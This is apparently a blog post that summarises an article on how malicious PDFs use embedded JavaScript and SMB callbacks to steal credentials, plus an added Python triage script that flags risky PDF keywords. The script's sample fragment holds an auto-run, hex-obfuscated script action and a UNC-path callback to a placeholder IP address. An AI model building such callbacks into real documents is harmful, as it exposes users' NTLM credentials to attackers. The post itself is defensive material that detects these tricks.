Malicious PDFs: Revealing the techniques behind the attacks

Click for: original source

Most of us are no strangers to phishing attempts, and over the years we’ve kept you informed about the latest tricks used by attackers in the epidemic of phishing and spear-phishing campaigns that plague email users in particular. This is an older but still useful article by Phil Stokes.

In some kinds of malicious PDF attacks, the PDF reader itself contains a vulnerability or flaw that allows a file to execute malicious code. Remember that PDF readers aren’t just standalone applications like Adobe Reader and Adobe Acrobat: most browsers contain a built-in PDF reader engine that can also be targeted. In other cases, attackers leverage AcroForms or XFA Forms, scripting technologies built into the PDF format that were intended to add useful, interactive features to a standard PDF document. “One of the easiest and most powerful ways to customize PDF files is by using JavaScript.” (Adobe)

Like other files that can come as attachments or links in an email, PDF files have received their fair share of attention from threat actors, too. In this post, we’ll take you on a tour of the technical aspects behind malicious PDF files: what they are, how they work, and how we can protect ourselves from them.

Contents of the article:

  • How Do PDF Files Execute Code?
  • Cleaning Up the Code
  • More Malicious JavaScript
  • Stealing Credentials with an SMB Attack
  • Another Day, Another Callback
  • Protecting Against PDF Attacks

It’s impossible to tell whether a PDF file contains a credential-stealing callback or malicious JavaScript before opening it, unless you actually inspect it in the ways we’ve shown here. Of course, for most users and most use cases, that’s not a practical solution.

There are, however, a couple of things you can do on the user side. Most readers and browsers have some form of JavaScript control. In Adobe’s Acrobat Reader DC, for example, you can disable Acrobat JavaScript in the Preferences and manage access to URLs. Similarly, with a bit of effort, users can also customize how Windows handles NTLM. To learn more, follow the link to the full article. Good read!
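The inspection the article refers to (counting the PDF name tokens that carry scripts, auto-run actions, forms and outbound references, and looking for the UNC-path callback used in the SMB credential-stealing trick) can be scripted. The triage routine below is an added example written for this post, not code from the original article or from any tool it mentions; the watched keyword list, the scoring rules and the embedded sample PDF fragment are all constructed for illustration.

```python
import re
from collections import Counter

# Name tokens worth counting in triage: /JS and /JavaScript carry scripts,
# /OpenAction and /AA run them automatically, /AcroForm and /XFA mark forms,
# /Launch, /URI, /GoToR and /SubmitForm reach outside the document.
WATCHED = ("/JavaScript", "/JS", "/OpenAction", "/AA", "/AcroForm", "/XFA",
           "/Launch", "/URI", "/GoToR", "/SubmitForm")

NAME_RE = re.compile(rb"/[A-Za-z0-9#]+")
HEX_ESC = re.compile(rb"#([0-9A-Fa-f]{2})")
# A UNC path (\\host\share) or file:// URL inside a PDF string is the callback
# the article describes: the reader contacts the host and Windows offers NTLM.
CALLBACK_RE = re.compile(rb"\\{2,}[\w.\-]+\\+[^\s)>]+|file://[^\s)>]+")

def normalize_name(raw: bytes) -> str:
    """Undo #XX hex escapes so an obfuscated /Java#53cript still counts as /JavaScript."""
    return HEX_ESC.sub(lambda m: bytes([int(m.group(1), 16)]), raw).decode("latin-1")

def triage_pdf(data: bytes) -> dict:
    """Return watched-keyword counts, callback targets and a verdict for raw PDF bytes."""
    counts = Counter()
    for m in NAME_RE.finditer(data):
        name = normalize_name(m.group(0))
        if name in WATCHED:
            counts[name] += 1
    # PDF literal strings escape a backslash as "\\", so collapse pairs for display.
    callbacks = [c.decode("latin-1").replace("\\\\", "\\") for c in CALLBACK_RE.findall(data)]
    script = counts["/JavaScript"] + counts["/JS"]
    auto_run = counts["/OpenAction"] + counts["/AA"]
    reasons = []
    if script and auto_run:
        reasons.append("script runs automatically on open")
    elif script:
        reasons.append("embedded JavaScript")
    if counts["/XFA"]:
        reasons.append("XFA form")
    if counts["/Launch"]:
        reasons.append("/Launch action")
    if callbacks:
        reasons.append("remote callback: " + ", ".join(callbacks))
    return {"counts": dict(counts), "callbacks": callbacks,
            "reasons": reasons, "suspicious": bool(reasons)}

# Constructed sample (not a real malware file, and not a complete PDF): a catalog with
# hex-obfuscated JavaScript in /OpenAction and a GoToR action pointing at a UNC path.
SAMPLE = (b"%PDF-1.7\n1 0 obj << /Type /Catalog /Pages 2 0 R "
          b"/OpenAction << /S /Java#53cript /JS (app.alert(1)) >> "
          b"/AA << /O << /S /GoToR /F (\\\\\\\\203.0.113.9\\\\share\\\\x.pdf) /D [0] >> >> >>\n"
          b"endobj\n%%EOF\n")

if __name__ == "__main__":
    print(triage_pdf(SAMPLE))
```

Run it against a file with `triage_pdf(open(path, "rb").read())`; it is a first-pass filter only, since scripts hidden inside compressed object streams need the streams inflated before the keywords become visible.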

[Read More]

Tags infosec cio cloud learning